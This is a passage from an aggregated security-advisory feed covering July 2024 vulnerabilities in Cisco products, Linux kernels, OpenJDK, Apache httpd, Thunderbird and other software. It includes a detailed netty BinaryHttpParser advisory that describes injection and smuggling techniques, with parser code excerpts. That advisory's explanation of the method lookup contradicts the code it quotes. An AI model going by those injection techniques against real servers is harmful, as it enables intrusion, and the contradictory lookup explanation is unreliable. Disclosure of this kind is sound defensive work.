https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-RV34X-RCE-7PQFU2E

17.07.2024 19:00:00 | cisco | [CISCO-SA-ISE-FILE-UPLOAD-KRW2TXA9] Cisco Identity Services Engine Arbitrary File Upload Vulnerability (high)
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to upload arbitrary files to an affected device. To exploit this vulnerability, an attacker would need at least valid Policy Admin credentials on the affected device.
This vulnerability is due to improper validation of files that are uploaded to the web-based management interface. An attacker could exploit this vulnerability by uploading arbitrary files to an affected device. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-FILE-UPLOAD-KRW2TXA9

17.07.2024 19:00:00 | cisco | [CISCO-SA-INODE-STATIC-KEY-VUVCEYNN] Cisco Intelligent Node Software Static Key Vulnerability (high)
A vulnerability in Cisco Intelligent Node (iNode) Software could allow an unauthenticated, remote attacker to hijack the TLS connection between Cisco iNode Manager and associated intelligent nodes and send arbitrary traffic to an affected device.
This vulnerability is due to the presence of hard-coded cryptographic material. An attacker in a man-in-the-middle position between Cisco iNode Manager and associated deployed nodes could exploit this vulnerability by using the static cryptographic key to generate a trusted certificate and impersonate an affected device. A successful exploit could allow the attacker to read data that is meant for a legitimate device, modify the startup configuration of an associated node, and, consequently, cause a denial of service (DoS) condition for downstream devices that are connected to the affected node.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-INODE-STATIC-KEY-VUVCEYNN

17.07.2024 19:00:00 | cisco | [CISCO-SA-EXPRESSWAY-REDIRECT-KJSFUXGJ] Cisco Expressway Series Open Redirect Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco Expressway Series could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.
This vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by intercepting and modifying an HTTP request from a user. A successful exploit could allow the attacker to redirect the user to a malicious web page.
Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-REDIRECT-KJSFUXGJ

17.07.2024 19:00:00 | cisco | [CISCO-SA-ESA-PRIV-ESC-SSTI-XNO2EOGZ] Cisco Secure Email Gateway Server-Side Template Injection Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco AsyncOS for Secure Email Gateway could allow an authenticated, remote attacker to execute arbitrary system commands on an affected device.
This vulnerability is due to insufficient input validation in certain portions of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges. To successfully exploit this vulnerability, an attacker would need at least valid Operator credentials.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-PRIV-ESC-SSTI-XNO2EOGZ

17.07.2024 19:00:00 | cisco | [CISCO-SA-ESA-AFW-BGG2USJH] Cisco Secure Email Gateway Arbitrary File Write Vulnerability (critical)
A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system.
This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device.
Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-AFW-BGG2USJH

17.07.2024 19:00:00 | cisco | [CISCO-SA-CSSM-AUTH-SLW3UHUY] Cisco Smart Software Manager On-Prem Password Change Vulnerability (critical)
A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users.
This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSSM-AUTH-SLW3UHUY

17.07.2024 18:48:31 | ubuntu | [USN-6900-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6900-1

17.07.2024 22:30:07 | npm | [NPM:GHSA-GHGQ-X6WC-6JR5] Zowe CLI allows storage of previously entered secure credentials in a plaintext file (moderate)
A vulnerability in Zowe CLI allows local, privileged actors to store previously entered secure credentials in a plaintext file as part of an auto-init operation.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GHGQ-X6WC-6JR5

17.07.2024 22:29:07 | maven | [MAVEN:GHSA-2RWM-XV5J-777P] Eclipse Parsson stack overflow when parsing deeply nested input (high)
In Eclipse Parsson before 1.0.4 and 1.1.3, a document with a large depth of nested objects can allow an attacker to cause a Java stack overflow exception and denial of service. Eclipse Parsson allows processing (e.g. parse, generate, transform and query) JSON documents.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2RWM-XV5J-777P

17.07.2024 18:09:25 | ubuntu | [USN-6898-2] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-2

17.07.2024 03:00:00 | cisa | [CISA-2024:0717] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)
CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0717

17.07.2024 03:00:00 | redhat | [RHSA-2024:4568] java-17-openjdk security update (important)
The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.
Security Fix(es):
* OpenJDK: RangeCheckElimination array index overflow (8323231) (CVE-2024-21147)
* OpenJDK: potential UTF8 size overflow (8314794) (CVE-2024-21131)
* OpenJDK: Excessive symbol length can lead to infinite loop (8319859) (CVE-2024-21138)
* OpenJDK: Range Check Elimination (RCE) pre-loop limit overflow (8320548) (CVE-2024-21140)
* OpenJDK: Out-of-bounds access in 2D image handling (8324559) (CVE-2024-21145)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4568

17.07.2024 03:00:00 | redhat | [RHSA-2024:4573] java-21-openjdk security update (important)
The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.
Security Fix(es):
* OpenJDK: RangeCheckElimination array index overflow (8323231) (CVE-2024-21147)
* OpenJDK: potential UTF8 size overflow (8314794) (CVE-2024-21131)
* OpenJDK: Excessive symbol length can lead to infinite loop (8319859) (CVE-2024-21138)
* OpenJDK: Range Check Elimination (RCE) pre-loop limit overflow (8320548) (CVE-2024-21140)
* OpenJDK: Out-of-bounds access in 2D image handling (8324559) (CVE-2024-21145)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4573

17.07.2024 22:30:44 | rubysec | [RUBYSEC:REXML-2024-39908] DoS in REXML (medium)
There is a DoS vulnerability in REXML gem. This vulnerability has been assigned the CVE identifier CVE-2024-39908. We strongly recommend upgrading the REXML gem.

## Details

When it parses an XML that has many specific characters such as `<`, `0` and `%>`, REXML gem may take a long time.

Please update REXML gem to version 3.3.2 or later.

## Affected versions

REXML gem 3.3.2 or prior

## Credits

Thanks to mprogrammer for discovering this issue.

## History

Originally published at 2024-07-16 03:00:00 (UTC)

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-39908

19.07.2024 01:14:29 | maven | [MAVEN:GHSA-Q8F2-HXQ5-CP4H] Absent Input Validation in BinaryHttpParser (high)

### Summary

`BinaryHttpParser` does not properly validate input values, thus giving attackers almost complete control over the HTTP requests constructed from the parsed output. Attackers can abuse several issues individually to perform various injection attacks including HTTP request smuggling, desync attacks, HTTP header injections, request queue poisoning, caching attacks and Server Side Request Forgery (SSRF). An attacker could also combine several issues to create well-formed messages for other text-based protocols, which may result in attacks beyond the HTTP protocol.

### Details

**Path, Authority, Scheme**

The BinaryHttpParser class implements the readRequestHead method which performs most of the relevant parsing of the received request. The data structure prefixes values with a variable length integer value. The algorithm to create a variable length integer value is below:

```python
def encode_int(n):
    # Variable-length integer: the two high bits of the first byte select the
    # total encoded length (1, 2, 4 or 8 bytes); the remaining bits carry n.
    if n < 64:
        base = 0x00
        l = 1
    elif n in range(64, 16384):
        base = 0x4000
        l = 2
    elif n in range(16384, 1073741824):
        base = 0x80000000
        l = 4
    else:
        base = 0xc000000000000000
        l = 8
    encoded = base | n
    # Emit exactly l big-endian bytes; a bare to_bytes() only works for values below 256.
    return encoded.to_bytes(l, 'big')
```

The parsing code below first gets the lengths of the values from the prefixed variable length integer. After it has all of the lengths and calculates all of the indices, the parser casts the applicable slices of the ByteBuf to String. Finally, it passes these values into a new `DefaultBinaryHttpRequest` object where no further parsing or validation occurs.

```java
//netty-incubator-codec-ohttp/codec-bhttp/src/main/java/io/netty/incubator/codec/bhttp/BinaryHttpParser.java
public final class BinaryHttpParser {
    ...
    private static BinaryHttpRequest readRequestHead(ByteBuf in, boolean knownLength, int maxFieldSectionSize) {
        ...
        final long pathLength = getVariableLengthInteger(in, pathLengthIdx, pathLengthBytes);
        ...
        final int pathIdx = pathLengthIdx + pathLengthBytes;
        ...
/*417*/ String method = in.toString(methodIdx, (int) methodLength, StandardCharsets.US_ASCII);
/*418*/ String scheme = in.toString(schemeIdx, (int) schemeLength, StandardCharsets.US_ASCII);
/*419*/ String authority = in.toString(authorityIdx, (int) authorityLength, StandardCharsets.US_ASCII);
/*420*/ String path = in.toString(pathIdx, (int) pathLength, StandardCharsets.US_ASCII);
/*422*/ BinaryHttpRequest request = new DefaultBinaryHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.valueOf(method), scheme, authority, path, headers);
        in.skipBytes(sumBytes);
        return request;
    }
    ...
}
```

**Request Method**

On line 422 above, the parsed method value is passed into the `HttpMethod.valueOf` method. The return value from this is passed to the `DefaultBinaryHttpRequest` constructor.

Below is the code for HttpMethod.valueOf:

```java
public static HttpMethod valueOf(String name) {
    // fast-path
    if (name == HttpMethod.GET.name()) {
        return HttpMethod.GET;
    }
    if (name == HttpMethod.POST.name()) {
        return HttpMethod.POST;
    }
    // "slow"-path
    HttpMethod result = methodMap.get(name);
    return result != null ? result : new HttpMethod(name);
}
```

If the result of `methodMap.get` is not `null`, then a new arbitrary `HttpMethod` instance will be returned using the provided name value.

`methodMap` is an instance of type `EnumNameMap` which is also defined within the `HttpMethod` class:

```java
EnumNameMap(Node<T>... nodes) {
    this.values = (Node[])(new Node[MathUtil.findNextPositivePowerOfTwo(nodes.length)]);
    this.valuesMask = this.values.length - 1;
    Node[] var2 = nodes;
    int var3 = nodes.length;
    for(int var4 = 0; var4 < var3; ++var4) {
        Node<T> node = var2[var4];
        int i = hashCode(node.key) & this.valuesMask;
        if (this.values[i] != null) {
            throw new IllegalArgumentException("index " + i + " collision between values: [" + this.values[i].key + ", " + node.key + ']');
        }
        this.values[i] = node;
    }
}

T get(String name) {
    Node<T> node = this.values[hashCode(name) & this.valuesMask];
    return node != null && node.key.equals(name) ? node.value : null;
}
```

Note that `EnumNameMap.get()` returns a boolean value, which is not `null`. Therefore, any arbitrary HTTP verb used within a `BinaryHttpRequest` will yield a valid `HttpMethod` object. When the `HttpMethod` object is constructed, the name is checked for whitespace and similar characters. Therefore, we cannot perform complete injection attacks using the HTTP verb alone. However, when combined with the other input validation issues, such as that in the path field, we can construct somewhat arbitrary data blobs that satisfy text-based protocol message formats.

### Impact

Method is partially validated while other values are not validated at all. Software that relies on netty to apply input validation for binary HTTP data may be vulnerable to various injection and protocol based attacks.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q8F2-HXQ5-CP4H

18.07.2024 23:23:31 | slackware | [SSA:2024-200-01] httpd
New httpd packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/httpd-2.4.62-i586-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  The first CVE is for Windows, but the second one is an additional fix for
  the source code disclosure regression when using AddType.
  Users are recommended to upgrade to version 2.4.62 which fixes this issue.
  For more information, see:
    https://downloads.apache.org/httpd/CHANGES_2.4.62
    https://www.cve.org/CVERecord?id=CVE-2024-40898
    https://www.cve.org/CVERecord?id=CVE-2024-40725
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.62-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.62-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.62-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.62-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
26f16142dba75d509e78213ca5b78258 httpd-2.4.62-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
ebaaed99b90d8085efd2ade4e61dec98 httpd-2.4.62-x86_64-1_slack15.0.txz

Slackware -current package:
c07f7b99705234a02bc0abbfe24c77e6 n/httpd-2.4.62-i586-1.txz

Slackware x86_64 -current package:
963391e1167fa2b20f31f222f23d90ae n/httpd-2.4.62-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg httpd-2.4.62-i586-1_slack15.0.txz`

Then, restart Apache httpd:
`# /etc/rc.d/rc.httpd stop`
`# /etc/rc.d/rc.httpd start`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-200-01

18.07.2024 18:22:03 | maven | [MAVEN:GHSA-XMVG-335G-X44Q] The OpenSearch reporting plugin improperly controls tenancy access to reporting resources (moderate)

### Summary

An issue in the OpenSearch reporting plugin allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed.

### Impact

The lack of proper access control validation for private tenant resources in the OpenSearch observability and reporting plugins can lead to unintended data access. If an authorized user with observability or reporting roles is aware of another user's private tenant resource ID, such as a notebook, they can potentially read, modify, or take ownership of that resource, despite not being the original author, thus impacting the confidentiality and integrity of private tenant resources. The impact is confined to private tenant resources, where authorized users may gain inappropriate visibility into data intended to be private from other users within the same OpenSearch instance, potentially violating the intended separation of access. This issue does not alter the scope of access but highlights a flaw in the existing access control mechanisms.

Impacted versions <= 2.13

### Patches

The patches are included in OpenSearch 2.14

### Workarounds

None

### References

OpenSearch 2.14 is available for download at https://opensearch.org/versions/opensearch-2-14-0.html
The latest version of OpenSearch is available for download at https://opensearch.org/downloads.html

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XMVG-335G-X44Q

18.07.2024 14:49:16 | ubuntu | [USN-6902-1] Apache HTTP Server vulnerability
Apache HTTP Server could be made to expose sensitive information over the network.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6902-1

18.07.2024 13:15:03 | alpinelinux | [ALPINE:CVE-2024-40898] apache2 vulnerability
[From CVE-2024-40898] SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests.
Users are recommended to upgrade to version 2.4.62 which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-40898

18.07.2024 13:15:02 | alpinelinux | [ALPINE:CVE-2024-40725] apache2 vulnerability
[From CVE-2024-40725] A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.
Users are recommended to upgrade to version 2.4.62, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-40725

18.07.2024 08:18:18 | ubuntu | [USN-6901-1] stunnel vulnerability (high)
stunnel could allow unintended access to network services.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6901-1

18.07.2024 03:00:00 | debian | [DSA-5733-1] thunderbird (critical)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5733-1

18.07.2024 03:00:00 | debian | [DSA-5732-1] chromium
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5732-1

18.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4617] qt5-qtbase security update (important)
[5.15.3-8]
- HTTP2: Delay any communication until encrypted() can be responded to
  Resolves: RHEL-46340
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4617

18.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4623] qt5-qtbase security update (important)
[5.15.9-10]
- HTTP2: Delay any communication until encrypted() can be responded to
  Resolves: RHEL-46348
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4623

18.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4636] libndp security update (important)
[1.8-6]
- Validate route information option length
[1.8-5]
- Convert the license tag to SPDX format
  Related: RHELMISC-1363
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4636

18.07.2024 03:00:00 | redhat | [RHSA-2024:4617] qt5-qtbase security update (important)
Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt.
Security Fix(es):
* qtbase: qtbase: Delay any communication until encrypted() can be responded to (CVE-2024-39936)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4617

18.07.2024 03:00:00 | redhat | [RHSA-2024:4620] libndp security update (important)
Libndp is a library (used by NetworkManager) that provides a wrapper for the IPv6 Neighbor Discovery Protocol. It also provides a tool named ndptool for sending and receiving NDP messages.
Security Fix(es):
* libndp: buffer overflow in route information length field (CVE-2024-5564)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4620

18.07.2024 03:00:00 | redhat | [RHSA-2024:4635] thunderbird security update (important)
Mozilla Thunderbird is a standalone mail and newsgroup client.
Security Fix(es):
* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)
* Mozilla: Race condition in permission assignment (CVE-2024-6601)
* Mozilla: Memory corruption in thread creation (CVE-2024-6603)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4635

18.07.2024 03:00:00 | redhat | [RHSA-2024:4623] qt5-qtbase security update (important)
Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt.
Security Fix(es):
* qtbase: qtbase: Delay any communication until encrypted() can be responded to (CVE-2024-39936)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4623

18.07.2024 03:00:00 | redhat | [RHSA-2024:4624] thunderbird security update (important)
Mozilla Thunderbird is a standalone mail and newsgroup client.
Security Fix(es):
* Mozilla: Race condition in permission assignment (CVE-2024-6601)
* Mozilla: Memory corruption in thread creation (CVE-2024-6603)
* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4624

18.07.2024 03:00:00 | redhat | [RHSA-2024:4636] libndp security update (important)
Libndp is a library (used by NetworkManager) that provides a wrapper for the IPv6 Neighbor Discovery Protocol. It also provides a tool named ndptool for sending and receiving NDP messages.
Security Fix(es):
* libndp: buffer overflow in route information length field (CVE-2024-5564)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4636

18.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4567] java-11-openjdk security update (important)

[11.0.24.0.8-2.0.1]
- Add Oracle vendor bug URL [Orabug: 34340155]

[1:11.0.24.0.8-1]
- Update to jdk-11.0.24+8 (GA)
- Update release notes to 11.0.24+8
- Adjusted DTLS & RPATH NEWS entries to match OpenJDK 17 & 21 release notes
- Switch to GA mode for release
- Fix Provides to reflect up to date component versions
- Add zlib build required or bundled version (1.3.1), depending on system_libs setting
- Resolves: RHEL-45202
- ** This tarball is embargoed until 2024-07-16 @ 1pm PT. **

[1:11.0.23.0.9-2]
- Fix 11.0.22 release date in NEWS

[1:11.0.23.0.9-1]
- Update to jdk-11.0.23+9 (GA)
- Update release notes to 11.0.23+9
- Switch to GA mode for release
- Require tzdata 2024a due to upstream inclusion of JDK-8322725
- Only require tzdata 2023d for now as 2024a is unavailable in buildroot
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
- Resolves: RHEL-30920

[1:11.0.23.0.1-0.1.ea]
- Update to jdk-11.0.23+1 (EA)
- Update release notes to 11.0.23+1
- Switch to EA mode

[1:11.0.22.0.7-1]
- Update to jdk-11.0.22+7 (GA)
- Sync the copy of the portable specfile with the latest update
- Drop local copy of JDK-8312489 which is now included upstream
- ** This tarball is embargoed until 2024-01-16 @ 1pm PT. **
- Resolves: RHEL-20991

[1:11.0.21.0.9-2]
- Update to jdk-11.0.21+9 (GA)
- Sync the copy of the portable specfile with the latest update
- Re-generate FIPS patch against 11.0.21+1 following backport of JDK-8155246
- Re-generate SHA3 patch following backport of JDK-8242151
- Bump libpng version to 1.6.39 following JDK-8305815
- Bump HarfBuzz version to 7.2.0 following JDK-8307301
- Bump freetype version to 2.13.0 following JDK-8306881
- Update generate_tarball.sh to be closer to upstream vanilla script inc. no more ECC removal
- Update bug URL for RHEL to point to the Red Hat customer portal
- Change top_level_dir_name to use the VCS tag, matching new upstream release style tarball
- Apply all patches using -p1
- Drop local backport of JDK-8243210 which is upstream from 11.0.21+2
- Add missing JFR alternative ghost
- Move jcmd to the headless package
- ** This tarball is embargoed until 2023-10-17 @ 1pm PT. **
- Resolves: RHEL-12214
- Resolves: RHEL-13526
- Resolves: RHEL-13529
- Resolves: RHEL-13532
- Resolves: RHEL-13536
- Resolves: RHEL-13539

[1:11.0.20.1.1-2]
- Bump release number so we are newer than 9.0
- Related: rhbz#2236590

[1:11.0.20.1.1-1]
- Update to jdk-11.0.20.1+1 (GA)
- Add backport of JDK-8312489 already upstream in 11.0.22 (see OPENJDK-2095)
- Add backport of JDK-8243210 already upstream in 11.0.21 (see RH2229269)
- Update openjdk_news script to specify subdirectory last
- Add missing discover_trees script required by openjdk_news
- Resolves: rhbz#2236590

[1:11.0.20.0.8-3]
- Fix tzdata requirement copy-and-paste error that led to two BuildRequires and no Requires
- Resolves: rhbz#2224420

[1:11.0.20.0.8-2]
- Bump release number so we are newer than 9.0
- Related: rhbz#2221106

[1:11.0.20.0.8-1]
- Update to jdk-11.0.20.0+8 (GA)
- Update release notes to 11.0.20.0+8
- Drop local inclusion of JDK-8274864 & JDK-8305113 as they are included in 11.0.20+1
- Bump tzdata requirement to 2023c now it is available in the buildroot
- Bump bundled LCMS version to 2.15 as in jdk-11.0.20+1.
- Bump bundled HarfBuzz version to 7.0.1 as in jdk-11.0.20+7
- Use tapsets from the misc tarball
- Introduce 'prelease' for the portable release versioning, to handle EA builds
- Make sure root installation directory is created first
- Use in-place substitution for all but the first of the tapset changes
- Sync the copy of the portable specfile with the latest update
- Add note at top of spec file about rebuilding
- ** This tarball is embargoed until 2023-07-18 @ 1pm PT. **
- Resolves: rhbz#2217715
- Resolves: rhbz#2221106

[1:11.0.19.0.7-4]
- Include the java-11-openjdk-portable.spec file with instructions on how to rebuild.
- Related: rhbz#2150201

[1:11.0.19.0.7-3]
- Revert 'Restore native build for x86 as there is no portable build'
- Reintroduce useful cleanups from x86 reversion
- Adjust oj_vendor_version & oj_vendor_bug_url to match the portable so test passes
- Related: rhbz#2150201

[1:11.0.19.0.7-2]
- Update to jdk-11.0.19.0+7
- Update release notes to 11.0.19.0+7
- Require tzdata 2023c due to local inclusion of JDK-8274864 & JDK-8305113
- Update generate_tarball.sh to add support for passing a boot JDK to the configure run
- Add POSIX-friendly error codes to generate_tarball.sh and fix whitespace
- Remove .jcheck and GitHub support when generating tarballs, as done in upstream release tarballs
- Rebase FIPS support against 11.0.19+6
- Rebase RH1750419 alt-java patch against 11.0.19+6
- Replace local copies of JDK portable binaries with build dependencies
- Use portable build on x86_32 now one is available
- ** This tarball is embargoed until 2023-04-18 @ 1pm PT. **
- Resolves: rhbz#2185182
- Resolves: rhbz#2150201

[1:11.0.18.0.10-4]
- On portable architectures, replace build section with extraction of existing builds from portables
- Rewrite ELF files so the source file path is correct and debugsources can be assembled
- Backport SHA-3 support for PKCS11 provider
- Sync patch set with portable build we are using by removing rh1648644-java_access_bridge_privileged_security.patch
- Resolves: rhbz#2150201

[1:11.0.18.0.10-3]
- Update to jdk-11.0.18+10 (GA)
- Update release notes to 11.0.18+10
- Switch to GA mode for release
- Resolves: rhbz#2160111

[1:11.0.18.0.9-0.3.ea]
- Update to jdk-11.0.18+9
- Update release notes to 11.0.18+9
- Drop local copy of JDK-8293834 now this is upstream
- Require tzdata 2022g due to inclusion of JDK-8296108, JDK-8296715 & JDK-8297804
- Update TestTranslations.java to test the new America/Ciudad_Juarez zone
- Resolves: rhbz#2150197

[1:11.0.18.0.1-0.3.ea]
- Update to jdk-11.0.18+1
- Update release notes to 11.0.18+1
- Switch to EA mode for 11.0.18 pre-release builds.
- Drop local copies of JDK-8294357 & JDK-8295173 now upstream contains tzdata 2022e
- Drop local copy of JDK-8275535 which is finally upstream
- Related: rhbz#2150197

[1:11.0.17.0.8-2]
- Update to jdk-11.0.17+8 (GA)
- Update release notes to 11.0.17+8
- Switch to GA mode for release
- Update in-tree tzdata to 2022e with JDK-8294357 & JDK-8295173
- Update CLDR data with Europe/Kyiv (JDK-8293834)
- Drop JDK-8292223 patch which we found to be unnecessary
- Update TestTranslations.java to use public API based on TimeZoneNamesTest upstream
- The stdc++lib, zlib & freetype options should always be set from the global, so they are not altered for staticlibs builds
- Remove freetype sources along with zlib sources
- Resolves: rhbz#2133695

[1:11.0.17.0.7-0.1.ea]
- Update to jdk-11.0.17+7
- Update release notes to 11.0.17+7
- Resolves: rhbz#2130619

[1:11.0.17.0.1-0.2.ea]
- Update to jdk-11.0.17+1
- Update release notes to 11.0.17+1
- Switch to EA mode for 11.0.17 pre-release builds.
- Bump HarfBuzz bundled version to 4.4.1 following JDK-8289853
- Bump FreeType bundled version to 2.12.1 following JDK-8290334
- Related: rhbz#2130619

[1:11.0.16.1.1-3]
- Switch to static builds, reducing system dependencies and making build more portable
- Resolves: rhbz#2121275

[1:11.0.16.1.1-2]
- Update to jdk-11.0.16.1+1
- Update release notes to 11.0.16.1+1
- Add patch to provide translations for Europe/Kyiv added in tzdata2022b
- Add test to ensure timezones can be translated
- Resolves: rhbz#2119528

[1:11.0.16.0.8-2]
- Update to jdk-11.0.16+8
- Update release notes to 11.0.16+8
- Switch to GA mode for release
- Resolves: rhbz#2106517

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4567

18.07.2024 03:00:00 oraclelinux [ELSA-2024-4568] java-17-openjdk security update (important)

[1:17.0.12.0.7-2.0.1]
- Add Oracle vendor bug URL

[1:17.0.12.0.7-2]
- Update to jdk-17.0.12+7 (GA)
- Update .gitignore to ignore openjdk-17.0.12+7.tar.xz
- Sync java-17-openjdk-portable.specfile
- Set buildver to 7
- Set portablerelease 1
- Set is_ga to 1
- Update sources to openjdk-17.0.12+7.tar.xz
- Resolves: RHEL-46641
- Resolves: RHEL-47019
- ** This tarball is embargoed until 2024-07-16 @ 1pm PT. **

[1:17.0.12.0.6-0.1.ea]
- Add debuginfo section to rpminspect.yaml (OPENJDK-2904)
- Add unicode section to rpminspect.yaml (OPENJDK-2904)

[1:17.0.12.0.6-0.1.ea]
- Add upstream patch that removes illegal RLO Unicode characters (JDK-8332174)
- Sync the copy of the portable specfile with the latest update

[1:17.0.12.0.6-0.1.ea]
- Delete fips-17u-d63771ea660.patch
- Add fips-17u-e893be00150.patch
- Update fipsver to e893be00150

